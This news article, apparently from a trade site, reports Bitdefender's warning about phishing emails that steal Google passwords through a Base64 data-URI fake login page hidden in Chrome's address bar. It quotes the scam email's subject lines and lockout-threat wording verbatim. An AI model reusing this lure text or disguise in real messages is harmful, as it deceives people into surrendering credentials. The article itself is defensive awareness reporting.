Hackers are stealing Google account passwords using a new phishing attack that is hard to catch with traditional heuristic detection, warns security firm Bitdefender.
The attack exploits the uniform resource identifiers (URIs) that Google Chrome uses to display data. This makes Chrome users most vulnerable, but the attack also targets Mozilla Firefox users.
“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist at Bitdefender.
“The scam starts with an email allegedly sent by Google, with ‘Mail Notice’ or ‘New Lockout Notice’ as the subject,” he said.
The messages reads: “This is a reminder that your email account will be locked out in 24 hours, due to not being able to increase your email storage quota.
“Go to the INSTANT INCREASE to increase your Email storage automatically.”
The link then redirects victims to a fake Google login web page that asks for their credentials.
“What is interesting about this phishing attack is that users end up having the ‘data:’ in their browser’s address bar, which indicates the use of a data URI scheme,” said Cosoi.
The data URI scheme, he said, allows scammers to include data in-line in web pages, as if they were external resources.
The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string in the data URI.
As Google Chrome does not show the whole string, Cosoi said regular users may not realise they are being targeted in a phishing attack and give their data to cyber criminals.
Disguised phishing on the rise
Google, Facebook, eBay, phone services and financial institutions are among phishers’ favourite disguises to invade inboxes worldwide, he said.
Phishing attacks are likely to increase due to the use of automation and the ability to bypass host-based detection systems, according to Johanne Ullrich, dean of research for the SANS Technology Institute.
However, this does not mean that businesses are powerless against such attacks. There are several ways businesses can reduce the risk of successful phishing attacks.
These range from security education aimed at making users more aware of phishing techniques, to implanting effective methods and procedures such as continuous network monitoring
Read more about phishing attacks
Phishing attacks track mobile adoption, research shows
Anti-phishing vital in Scada protection, says expert
Phishing attacks cast wider nets in businesses
Black Hat 2012: Phishing and social engineering penetration testing
Don’t get spiked by a spear phisher
Mitigate phishing attacks in the cloud: A how-to
Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox.
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
Related content from ComputerWeekly.com
RELATED CONTENT FROM THE TECHTARGET NETWORK